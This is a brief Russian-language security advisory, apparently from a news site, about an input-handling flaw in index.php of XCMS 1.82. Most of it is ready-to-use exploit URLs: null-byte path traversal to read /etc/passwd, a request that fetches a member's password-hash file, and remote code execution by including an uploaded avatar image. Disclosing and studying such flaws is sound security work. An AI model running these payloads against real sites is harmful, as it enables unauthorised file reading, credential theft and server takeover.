Программа: XCMS 1.82

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий и получить доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

LFI:

http://127.0.0.1/xcms/index.php?pg=admin&s=../../../../../etc/passwd\0
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../../../../etc/passwd\0

Получение Hash:

http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../dati/membri/[username].dtb\0

RCE:

http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../uploads/avatar/[your_username].jpg\0



Оставить мнение